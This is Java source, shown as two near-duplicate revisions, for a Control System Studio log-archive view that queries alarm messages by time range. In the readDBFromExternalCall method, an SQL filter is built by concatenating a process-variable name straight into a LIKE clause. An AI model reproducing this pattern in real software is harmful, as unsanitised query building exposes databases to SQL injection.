org.csstudio.alarm.table.dataModel.JMSMessageList; import org.csstudio.alarm.table.expertSearch.ExpertSearchDialog; import org.csstudio.alarm.table.internal.localization.Messages; import org.csstudio.alarm.table.logTable.JMSLogTableViewer; import org.csstudio.alarm.table.preferences.LogArchiveViewerPreferenceConstants; import org.csstudio.alarm.table.preferences.LogViewerPreferenceConstants; import org.csstudio.alarm.table.readDB.DBAnswer; import org.csstudio.alarm.table.readDB.ReadDBJob; import org.csstudio.platform.data.ITimestamp; import org.csstudio.platform.data.TimestampFactory; import org.csstudio.platform.model.IProcessVariable; import org.csstudio.util.time.StartEndTimeParser; import org.csstudio.util.time.swt.StartEndDialog; import org.eclipse.jface.preference.IPreferenceStore; import org.eclipse.swt.SWT; import org.eclipse.swt.events.SelectionAdapter; import org.eclipse.swt.events.SelectionEvent; import org.eclipse.swt.graphics.Color; import org.eclipse.swt.layout.GridData; import org.eclipse.swt.layout.GridLayout; import org.eclipse.swt.widgets.Button; import org.eclipse.swt.widgets.Composite; import org.eclipse.swt.widgets.Display; import org.eclipse.swt.widgets.Group; import org.eclipse.swt.widgets.Label; import org.eclipse.swt.widgets.Shell; import org.eclipse.swt.widgets.Text; import org.eclipse.ui.part.ViewPart; /** * Simple view more like console, used to write log messages. * * @author jhatje * @author $Author$ * @version $Revision$ * @since 19.07.2007 */ public class LogViewArchive extends ViewPart implements Observer { /** The Id of this Object. */ public static final String ID = LogViewArchive.class.getName(); /** The Parent Shell. */ private Shell _parentShell = null; /** The JMS message list. 
*/ private JMSMessageList _jmsMessageList = null; /** The JMS Logtable Viewer. */ private JMSLogTableViewer _jmsLogTableViewer = null; /** An Array whit the name of the Columns. */ private String[] _columnNames; /** Textfield witch contain the "from time". */ private Text _timeFrom; /** Textfield witch contain the "to time". */ private Text _timeTo; /** The selectet "from time". */ private ITimestamp _fromTime; /** The selectet "to time". */ private ITimestamp _toTime; /** The column property change listener. */ private ColumnPropertyChangeListener _columnPropertyChangeListener; /** The default / last filter. */ private String _filter= ""; //$NON-NLS-1$ /** * The Answer from the DB. */ private DBAnswer _dbAnswer = null; /** The Display. */ private Display _disp; /** The count of results. */ private Label _countLabel; public LogViewArchive() { super(); _dbAnswer = new DBAnswer(); _dbAnswer.addObserver(this); } /** {@inheritDoc} */ public final void createPartControl(final Composite parent) { _disp = parent.getDisplay(); _columnNames = JmsLogsPlugin.getDefault().getPluginPreferences() .getString(LogArchiveViewerPreferenceConstants.P_STRINGArch) .split(";"); //$NON-NLS-1$ _jmsMessageList = new JMSMessageList(_columnNames); _parentShell = parent.getShell(); GridLayout grid = new GridLayout(); grid.numColumns = 1; parent.setLayout(grid); Composite comp = new Composite(parent, SWT.NONE); comp.setLayoutData(new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1)); comp.setLayout(new GridLayout(4, false)); Group buttons = new Group(comp, SWT.LINE_SOLID); buttons.setText(Messages.getString("LogViewArchive_period")); //$NON-NLS-1$ buttons.setLayout(new GridLayout(5, true)); GridData gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 300; buttons.setLayoutData(gd); create24hButton(buttons); create72hButton(buttons); createWeekButton(buttons); createFlexButton(buttons); createSearchButton(buttons); Group from = new Group(comp, SWT.LINE_SOLID); from.setText(Messages.getString("LogViewArchive_from")); //$NON-NLS-1$ gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 150; from.setLayoutData(gd); from.setLayout(new GridLayout(1, true)); _timeFrom = new Text(from, SWT.SINGLE); _timeFrom.setLayoutData(new GridData(SWT.FILL,SWT.FILL,true,false,1,1)); _timeFrom.setEditable(false); _timeFrom.setText(" "); //$NON-NLS-1$ Group to = new Group(comp, SWT.LINE_SOLID); to.setText(Messages.getString("LogViewArchive_to")); //$NON-NLS-1$ gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 150; to.setLayoutData(gd); to.setLayout(new GridLayout(1, true)); _timeTo = new Text(to, SWT.SINGLE); _timeTo.setLayoutData(new GridData(SWT.FILL,SWT.FILL,true,false,1,1)); _timeTo.setEditable(false); // timeTo.setText(" "); Group count = new Group(comp, SWT.LINE_SOLID); count.setText(Messages.getString("LogViewArchive_count")); //$NON-NLS-1$ count.setLayout(new GridLayout(1, true)); gd = new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 75; count.setLayoutData(gd); _countLabel = new Label(count,SWT.RIGHT); gd = new GridData(SWT.FILL,SWT.CENTER,true, false,1,1); _countLabel.setLayoutData(gd); _countLabel.setText("0"); //$NON-NLS-1$ _jmsLogTableViewer = new JMSLogTableViewer(parent, getSite(), _columnNames, _jmsMessageList, 3,SWT.SINGLE | SWT.FULL_SELECTION); _jmsLogTableViewer.setAlarmSorting(false); parent.pack(); _columnPropertyChangeListener = new 
ColumnPropertyChangeListener( LogArchiveViewerPreferenceConstants.P_STRINGArch, _jmsLogTableViewer); JmsLogsPlugin.getDefault().getPluginPreferences() .addPropertyChangeListener(_columnPropertyChangeListener); } /** * Create a Button to selet the last 24 hour. * @param comp the parent Composite for the Button. */ private void create24hButton(final Composite comp) { Button b24hSearch = new Button(comp, SWT.PUSH); b24hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); b24hSearch.setText(Messages.getString("LogViewArchive_day")); //$NON-NLS-1$ b24hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { ILogMessageArchiveAccess adba = new ArchiveDBAccess(); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -24); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create the a Button to selet the last 72 hour. * @param comp the parent {@link Composite} for the Button. */ private void create72hButton(final Composite comp) { Button b72hSearch = new Button(comp, SWT.PUSH); b72hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); b72hSearch.setText(Messages.getString("LogViewArchive_3days")); //$NON-NLS-1$ b72hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { ILogMessageArchiveAccess adba = new ArchiveDBAccess(); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -72); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create a Button to selet the last week. * @param comp the parent Composite for the Button. */ private void createWeekButton(final Composite comp) { Button b168hSearch = new Button(comp, SWT.PUSH); b168hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false,1, 1)); b168hSearch.setText(Messages.getString("LogViewArchive_week")); //$NON-NLS-1$ b168hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -168); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create a Button that open a dialog to select required period. * @param comp the parent Composite for the Button. 
*/ private void createFlexButton(final Composite comp) { Button bFlexSearch = new Button(comp, SWT.PUSH); bFlexSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); bFlexSearch.setText(Messages.getString("LogViewArchive_user")); //$NON-NLS-1$ bFlexSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { StartEndDialog dlg = new StartEndDialog(_parentShell); if (dlg.open() == StartEndDialog.OK) { String lowString = dlg.getStartSpecification(); String highString = dlg.getEndSpecification(); try { StartEndTimeParser parser = new StartEndTimeParser(lowString, highString); Calendar from = parser.getStart(); Calendar to = parser.getEnd(); // ILogMessageArchiveAccess adba = new ArchiveDBAccess(); showNewTime(from, to); // ArrayList<HashMap<String, String>> am = adba.getLogMessages(from, to); // _jmsMessageList.clearList(); // _jmsLogTableViewer.refresh(); // _jmsMessageList.addJMSMessageList(am); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); // ArrayList<HashMap<String, String>> am = adba.getLogMessages( // from, to); readDB.schedule(); } catch (Exception e1) { // TODO Auto-generated catch block JmsLogsPlugin.logInfo(e1.getMessage()); } } } }); } /** * Create a Button that open a dialog to select required period and define filters. * @param comp the parent Composite for the Button. */ private void createSearchButton(final Composite comp) { Button bSearch = new Button(comp, SWT.PUSH); bSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); bSearch.setText(Messages.getString("LogViewArchive_expert")); //$NON-NLS-1$ bSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { if(_fromTime==null){ ITimestamp now = TimestampFactory.now(); _fromTime = TimestampFactory.createTimestamp(now.seconds()-(24*60*60), now.nanoseconds()); //new Timestamp(fromDate.getTime()/1000); } if(_toTime==null){ _toTime = TimestampFactory.now(); } ExpertSearchDialog dlg = new ExpertSearchDialog(_parentShell, _fromTime, _toTime, _filter); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); if (dlg.open() == ExpertSearchDialog.OK) { _fromTime = dlg.getStart(); _toTime = dlg.getEnd(); double low = _fromTime.toDouble(); double high = _toTime.toDouble(); if (low < high) { from.setTimeInMillis((long) low * 1000); to.setTimeInMillis((long) high * 1000); } else { from.setTimeInMillis((long) high * 1000); to.setTimeInMillis((long) low * 1000); } showNewTime(from, to); _filter = dlg.getFilterString(); } ILogMessageArchiveAccess adba = new ArchiveDBAccess(); // from.add(GregorianCalendar.HOUR, -504); showNewTime(from, to); // ArrayList<HashMap<String, String>> am; // if(_filter.trim().length()>0){ // am = adba.getLogMessages(from, to, _filter); // }else{ // am = adba.getLogMessages(from, to); // } // _jmsMessageList.clearList(); // _jmsLogTableViewer.refresh(); // _jmsMessageList.addJMSMessageList(am); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to, _filter); readDB.schedule(); } }); } public void readDBFromExternalCall(IProcessVariable pv) { GregorianCalendar from = new GregorianCalendar(); GregorianCalendar to = new GregorianCalendar(); from.setTimeInMillis(to.getTimeInMillis() - 1000*60*60*24); System.out.println("from: " + from.toString() + " to: " + to.toString()); //$NON-NLS-1$ //$NON-NLS-2$ _filter = "AND ( (lower(aam.PROPERTY) like 
lower('NAME') AND lower(aam.VALUE) like lower('" + //$NON-NLS-1$ pv.getName() + "')))"; //$NON-NLS-1$ ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to, _filter); readDB.schedule(); } /** * Set the two times from, to . * @param from the from a selectet. * @param to the to a selectet. */ private void showNewTime(final Calendar from, final Calendar to) { SimpleDateFormat sdf = new SimpleDateFormat(); try{ sdf.applyPattern(JmsLogsPlugin.getDefault().getPreferenceStore().getString(LogArchiveViewerPreferenceConstants.DATE_FORMAT)); }catch(Exception e){ sdf.applyPattern(JmsLogsPlugin.getDefault().getPreferenceStore().getDefaultString(LogArchiveViewerPreferenceConstants.DATE_FORMAT)); JmsLogsPlugin.getDefault().getPreferenceStore().setToDefault(LogArchiveViewerPreferenceConstants.DATE_FORMAT); } _timeFrom.setText(sdf.format(from.getTime())); _fromTime = TimestampFactory.fromCalendar(from); _timeTo.setText(sdf.format(to.getTime())); _toTime = TimestampFactory.fromCalendar(to); // redraw _timeFrom.getParent().getParent().redraw(); } /** {@inheritDoc} */ @Override public void setFocus() { } /** {@inheritDoc} */ @Override public final void dispose() { super.dispose(); JmsLogsPlugin.getDefault().getPluginPreferences() .removePropertyChangeListener(_columnPropertyChangeListener); } /** @return get the from Time. */ public final Date getFromTime(){ return _fromTime.toCalendar().getTime(); } /** @return get the to Time. */ public final Date getToTime(){ return _toTime.toCalendar().getTime(); } /** * When dispose store the width for each column. */ public void saveColumn(){ int[] width = _jmsLogTableViewer.getColumnWidth(); String newPreferenceColumnString=""; //$NON-NLS-1$ String[] columns = JmsLogsPlugin.getDefault().getPluginPreferences().getString(LogArchiveViewerPreferenceConstants.P_STRINGArch).split(";"); //$NON-NLS-1$ if(width.length!=columns.length){ return; } for (int i = 0; i < columns.length; i++) { newPreferenceColumnString = newPreferenceColumnString.concat(columns[i].split(",")[0]+","+width[i]+";"); //$NON-NLS-1$ //$NON-NLS-2$ //$NON-NLS-3$ } newPreferenceColumnString = newPreferenceColumnString.substring(0,newPreferenceColumnString.length()-1); IPreferenceStore store = JmsLogsPlugin.getDefault().getPreferenceStore(); store.setValue(LogArchiveViewerPreferenceConstants.P_STRINGArch, newPreferenceColumnString); if(store.needsSaving()){ JmsLogsPlugin.getDefault().savePluginPreferences(); } } public void update(Observable arg0, Object arg1) { _disp.syncExec(new Runnable() { public void run() { _jmsMessageList.clearList(); _jmsLogTableViewer.refresh(); ArrayList<HashMap<String, String>> answer = _dbAnswer.getDBAnswer(); int size = answer.size(); if (size > 0) { _countLabel.setText(Integer.toString(size)); _jmsMessageList.addJMSMessageList(answer); } else { String[] propertyNames = JmsLogsPlugin.getDefault().getPluginPreferences(). getString(LogViewerPreferenceConstants.P_STRING).split(";"); //$NON-NLS-1$ JMSMessage jmsMessage = new JMSMessage(propertyNames); String firstColumnName = _columnNames[0]; jmsMessage.setProperty(firstColumnName, Messages.LogViewArchive_NoMessageInDB); _jmsMessageList.addJMSMessage(jmsMessage); } } }); } }
applications/plugins/org.csstudio.alarm.table/src/org/csstudio/alarm/table/LogViewArchive.java
/* * Copyright (c) 2006 Stiftung Deutsches Elektronen-Synchroton, * Member of the Helmholtz Association, (DESY), HAMBURG, GERMANY. * * THIS SOFTWARE IS PROVIDED UNDER THIS LICENSE ON AN "../AS IS" BASIS. * WITHOUT WARRANTY OF ANY KIND, EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR PARTICULAR PURPOSE AND * NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE * FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, * TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR * THE USE OR OTHER DEALINGS IN THE SOFTWARE. SHOULD THE SOFTWARE PROVE DEFECTIVE * IN ANY RESPECT, THE USER ASSUMES THE COST OF ANY NECESSARY SERVICING, REPAIR OR * CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. * NO USE OF ANY SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER. * DESY HAS NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, * OR MODIFICATIONS. * THE FULL LICENSE SPECIFYING FOR THE SOFTWARE THE REDISTRIBUTION, MODIFICATION, * USAGE AND OTHER RIGHTS AND OBLIGATIONS IS INCLUDED WITH THE DISTRIBUTION OF THIS * PROJECT IN THE FILE LICENSE.HTML. IF THE LICENSE IS NOT INCLUDED YOU MAY FIND A COPY * AT HTTP://WWW.DESY.DE/LEGAL/LICENSE.HTM */ package org.csstudio.alarm.table; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Date; import java.util.GregorianCalendar; import java.util.HashMap; import java.util.Observable; import java.util.Observer; import org.csstudio.alarm.dbaccess.ArchiveDBAccess; import org.csstudio.alarm.dbaccess.archivedb.ILogMessageArchiveAccess; import org.csstudio.alarm.table.dataModel.JMSMessage; import org.csstudio.alarm.table.dataModel.JMSMessageList; import org.csstudio.alarm.table.expertSearch.ExpertSearchDialog; import org.csstudio.alarm.table.internal.localization.Messages; import org.csstudio.alarm.table.logTable.JMSLogTableViewer; import org.csstudio.alarm.table.preferences.LogArchiveViewerPreferenceConstants; import org.csstudio.alarm.table.preferences.LogViewerPreferenceConstants; import org.csstudio.alarm.table.readDB.DBAnswer; import org.csstudio.alarm.table.readDB.ReadDBJob; import org.csstudio.platform.data.ITimestamp; import org.csstudio.platform.data.TimestampFactory; import org.csstudio.platform.model.IProcessVariable; import org.csstudio.util.time.StartEndTimeParser; import org.csstudio.util.time.swt.StartEndDialog; import org.eclipse.jface.preference.IPreferenceStore; import org.eclipse.swt.SWT; import org.eclipse.swt.events.SelectionAdapter; import org.eclipse.swt.events.SelectionEvent; import org.eclipse.swt.graphics.Color; import org.eclipse.swt.layout.GridData; import org.eclipse.swt.layout.GridLayout; import org.eclipse.swt.widgets.Button; import org.eclipse.swt.widgets.Composite; import org.eclipse.swt.widgets.Display; import org.eclipse.swt.widgets.Group; import org.eclipse.swt.widgets.Label; import org.eclipse.swt.widgets.Shell; import org.eclipse.swt.widgets.Text; import org.eclipse.ui.part.ViewPart; /** * Simple view more like console, used to write log messages. * * @author jhatje * @author $Author$ * @version $Revision$ * @since 19.07.2007 */ public class LogViewArchive extends ViewPart implements Observer { /** The Id of this Object. */ public static final String ID = LogViewArchive.class.getName(); /** The Parent Shell. */ private Shell _parentShell = null; /** The JMS message list. 
*/ private JMSMessageList _jmsMessageList = null; /** The JMS Logtable Viewer. */ private JMSLogTableViewer _jmsLogTableViewer = null; /** An Array whit the name of the Columns. */ private String[] _columnNames; /** Textfield witch contain the "from time". */ private Text _timeFrom; /** Textfield witch contain the "to time". */ private Text _timeTo; /** The selectet "from time". */ private ITimestamp _fromTime; /** The selectet "to time". */ private ITimestamp _toTime; /** The column property change listener. */ private ColumnPropertyChangeListener _columnPropertyChangeListener; /** The default / last filter. */ private String _filter= ""; //$NON-NLS-1$ /** * The Answer from the DB. */ private DBAnswer _dbAnswer = null; /** The Display. */ private Display _disp; /** The count of results. */ private Label _countLabel; public LogViewArchive() { super(); _dbAnswer = new DBAnswer(); _dbAnswer.addObserver(this); } /** {@inheritDoc} */ public final void createPartControl(final Composite parent) { _disp = parent.getDisplay(); _columnNames = JmsLogsPlugin.getDefault().getPluginPreferences() .getString(LogArchiveViewerPreferenceConstants.P_STRINGArch) .split(";"); //$NON-NLS-1$ _jmsMessageList = new JMSMessageList(_columnNames); _parentShell = parent.getShell(); GridLayout grid = new GridLayout(); grid.numColumns = 1; parent.setLayout(grid); Composite comp = new Composite(parent, SWT.NONE); comp.setLayoutData(new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1)); comp.setLayout(new GridLayout(4, true)); Group buttons = new Group(comp, SWT.LINE_SOLID); buttons.setText(Messages.getString("LogViewArchive_period")); //$NON-NLS-1$ buttons.setLayout(new GridLayout(5, true)); GridData gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 300; buttons.setLayoutData(gd); create24hButton(buttons); create72hButton(buttons); createWeekButton(buttons); createFlexButton(buttons); createSearchButton(buttons); Group from = new Group(comp, SWT.LINE_SOLID); from.setText(Messages.getString("LogViewArchive_from")); //$NON-NLS-1$ from.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1)); from.setLayout(new GridLayout(1, true)); _timeFrom = new Text(from, SWT.SINGLE); _timeFrom.setLayoutData(new GridData(SWT.FILL,SWT.FILL,true,false,1,1)); _timeFrom.setEditable(false); _timeFrom.setText(" "); //$NON-NLS-1$ Group to = new Group(comp, SWT.LINE_SOLID); to.setText(Messages.getString("LogViewArchive_to")); //$NON-NLS-1$ to.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1)); to.setLayout(new GridLayout(1, true)); _timeTo = new Text(to, SWT.SINGLE); _timeTo.setLayoutData(new GridData(SWT.FILL,SWT.FILL,true,false,1,1)); _timeTo.setEditable(false); // timeTo.setText(" "); Group count = new Group(comp, SWT.LINE_SOLID); count.setText(Messages.getString("LogViewArchive_count")); //$NON-NLS-1$ count.setLayout(new GridLayout(1, true)); gd = new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 300; count.setLayoutData(gd); _countLabel = new Label(count,SWT.RIGHT); gd = new GridData(SWT.FILL,SWT.CENTER,true, false,1,1); _countLabel.setLayoutData(gd); _countLabel.setText("0"); //$NON-NLS-1$ _jmsLogTableViewer = new JMSLogTableViewer(parent, getSite(), _columnNames, _jmsMessageList, 3,SWT.SINGLE | SWT.FULL_SELECTION); _jmsLogTableViewer.setAlarmSorting(false); parent.pack(); _columnPropertyChangeListener = new ColumnPropertyChangeListener( LogArchiveViewerPreferenceConstants.P_STRINGArch, _jmsLogTableViewer); 
JmsLogsPlugin.getDefault().getPluginPreferences() .addPropertyChangeListener(_columnPropertyChangeListener); } /** * Create a Button to selet the last 24 hour. * @param comp the parent Composite for the Button. */ private void create24hButton(final Composite comp) { Button b24hSearch = new Button(comp, SWT.PUSH); b24hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); b24hSearch.setText(Messages.getString("LogViewArchive_day")); //$NON-NLS-1$ b24hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { ILogMessageArchiveAccess adba = new ArchiveDBAccess(); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -24); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create the a Button to selet the last 72 hour. * @param comp the parent {@link Composite} for the Button. */ private void create72hButton(final Composite comp) { Button b72hSearch = new Button(comp, SWT.PUSH); b72hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); b72hSearch.setText(Messages.getString("LogViewArchive_3days")); //$NON-NLS-1$ b72hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { ILogMessageArchiveAccess adba = new ArchiveDBAccess(); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -72); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create a Button to selet the last week. * @param comp the parent Composite for the Button. */ private void createWeekButton(final Composite comp) { Button b168hSearch = new Button(comp, SWT.PUSH); b168hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false,1, 1)); b168hSearch.setText(Messages.getString("LogViewArchive_week")); //$NON-NLS-1$ b168hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -168); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create a Button that open a dialog to select required period. * @param comp the parent Composite for the Button. 
*/ private void createFlexButton(final Composite comp) { Button bFlexSearch = new Button(comp, SWT.PUSH); bFlexSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); bFlexSearch.setText(Messages.getString("LogViewArchive_user")); //$NON-NLS-1$ bFlexSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { StartEndDialog dlg = new StartEndDialog(_parentShell); if (dlg.open() == StartEndDialog.OK) { String lowString = dlg.getStartSpecification(); String highString = dlg.getEndSpecification(); try { StartEndTimeParser parser = new StartEndTimeParser(lowString, highString); Calendar from = parser.getStart(); Calendar to = parser.getEnd(); // ILogMessageArchiveAccess adba = new ArchiveDBAccess(); showNewTime(from, to); // ArrayList<HashMap<String, String>> am = adba.getLogMessages(from, to); // _jmsMessageList.clearList(); // _jmsLogTableViewer.refresh(); // _jmsMessageList.addJMSMessageList(am); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); // ArrayList<HashMap<String, String>> am = adba.getLogMessages( // from, to); readDB.schedule(); } catch (Exception e1) { // TODO Auto-generated catch block JmsLogsPlugin.logInfo(e1.getMessage()); } } } }); } /** * Create a Button that open a dialog to select required period and define filters. * @param comp the parent Composite for the Button. */ private void createSearchButton(final Composite comp) { Button bSearch = new Button(comp, SWT.PUSH); bSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); bSearch.setText(Messages.getString("LogViewArchive_expert")); //$NON-NLS-1$ bSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { if(_fromTime==null){ ITimestamp now = TimestampFactory.now(); _fromTime = TimestampFactory.createTimestamp(now.seconds()-(24*60*60), now.nanoseconds()); //new Timestamp(fromDate.getTime()/1000); } if(_toTime==null){ _toTime = TimestampFactory.now(); } ExpertSearchDialog dlg = new ExpertSearchDialog(_parentShell, _fromTime, _toTime, _filter); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); if (dlg.open() == ExpertSearchDialog.OK) { _fromTime = dlg.getStart(); _toTime = dlg.getEnd(); double low = _fromTime.toDouble(); double high = _toTime.toDouble(); if (low < high) { from.setTimeInMillis((long) low * 1000); to.setTimeInMillis((long) high * 1000); } else { from.setTimeInMillis((long) high * 1000); to.setTimeInMillis((long) low * 1000); } showNewTime(from, to); _filter = dlg.getFilterString(); } ILogMessageArchiveAccess adba = new ArchiveDBAccess(); // from.add(GregorianCalendar.HOUR, -504); showNewTime(from, to); // ArrayList<HashMap<String, String>> am; // if(_filter.trim().length()>0){ // am = adba.getLogMessages(from, to, _filter); // }else{ // am = adba.getLogMessages(from, to); // } // _jmsMessageList.clearList(); // _jmsLogTableViewer.refresh(); // _jmsMessageList.addJMSMessageList(am); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to, _filter); readDB.schedule(); } }); } public void readDBFromExternalCall(IProcessVariable pv) { GregorianCalendar from = new GregorianCalendar(); GregorianCalendar to = new GregorianCalendar(); from.setTimeInMillis(to.getTimeInMillis() - 1000*60*60*24); System.out.println("from: " + from.toString() + " to: " + to.toString()); //$NON-NLS-1$ //$NON-NLS-2$ _filter = "AND ( (lower(aam.PROPERTY) like 
lower('NAME') AND lower(aam.VALUE) like lower('" + //$NON-NLS-1$ pv.getName() + "')))"; //$NON-NLS-1$ ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to, _filter); readDB.schedule(); } /** * Set the two times from, to . * @param from the from a selectet. * @param to the to a selectet. */ private void showNewTime(final Calendar from, final Calendar to) { SimpleDateFormat sdf = new SimpleDateFormat(); try{ sdf.applyPattern(JmsLogsPlugin.getDefault().getPreferenceStore().getString(LogArchiveViewerPreferenceConstants.DATE_FORMAT)); }catch(Exception e){ sdf.applyPattern(JmsLogsPlugin.getDefault().getPreferenceStore().getDefaultString(LogArchiveViewerPreferenceConstants.DATE_FORMAT)); JmsLogsPlugin.getDefault().getPreferenceStore().setToDefault(LogArchiveViewerPreferenceConstants.DATE_FORMAT); } _timeFrom.setText(sdf.format(from.getTime())); _fromTime = TimestampFactory.fromCalendar(from); _timeTo.setText(sdf.format(to.getTime())); _toTime = TimestampFactory.fromCalendar(to); // redraw _timeFrom.getParent().getParent().redraw(); } /** {@inheritDoc} */ @Override public void setFocus() { } /** {@inheritDoc} */ @Override public final void dispose() { super.dispose(); JmsLogsPlugin.getDefault().getPluginPreferences() .removePropertyChangeListener(_columnPropertyChangeListener); } /** @return get the from Time. */ public final Date getFromTime(){ return _fromTime.toCalendar().getTime(); } /** @return get the to Time. */ public final Date getToTime(){ return _toTime.toCalendar().getTime(); } /** * When dispose store the width for each column. */ public void saveColumn(){ int[] width = _jmsLogTableViewer.getColumnWidth(); String newPreferenceColumnString=""; //$NON-NLS-1$ String[] columns = JmsLogsPlugin.getDefault().getPluginPreferences().getString(LogArchiveViewerPreferenceConstants.P_STRINGArch).split(";"); //$NON-NLS-1$ if(width.length!=columns.length){ return; } for (int i = 0; i < columns.length; i++) { newPreferenceColumnString = newPreferenceColumnString.concat(columns[i].split(",")[0]+","+width[i]+";"); //$NON-NLS-1$ //$NON-NLS-2$ //$NON-NLS-3$ } newPreferenceColumnString = newPreferenceColumnString.substring(0,newPreferenceColumnString.length()-1); IPreferenceStore store = JmsLogsPlugin.getDefault().getPreferenceStore(); store.setValue(LogArchiveViewerPreferenceConstants.P_STRINGArch, newPreferenceColumnString); if(store.needsSaving()){ JmsLogsPlugin.getDefault().savePluginPreferences(); } } public void update(Observable arg0, Object arg1) { _disp.syncExec(new Runnable() { public void run() { _jmsMessageList.clearList(); _jmsLogTableViewer.refresh(); ArrayList<HashMap<String, String>> answer = _dbAnswer.getDBAnswer(); int size = answer.size(); if (size > 0) { _countLabel.setText(Integer.toString(size)); _jmsMessageList.addJMSMessageList(answer); } else { String[] propertyNames = JmsLogsPlugin.getDefault().getPluginPreferences(). getString(LogViewerPreferenceConstants.P_STRING).split(";"); //$NON-NLS-1$ JMSMessage jmsMessage = new JMSMessage(propertyNames); String firstColumnName = _columnNames[0]; 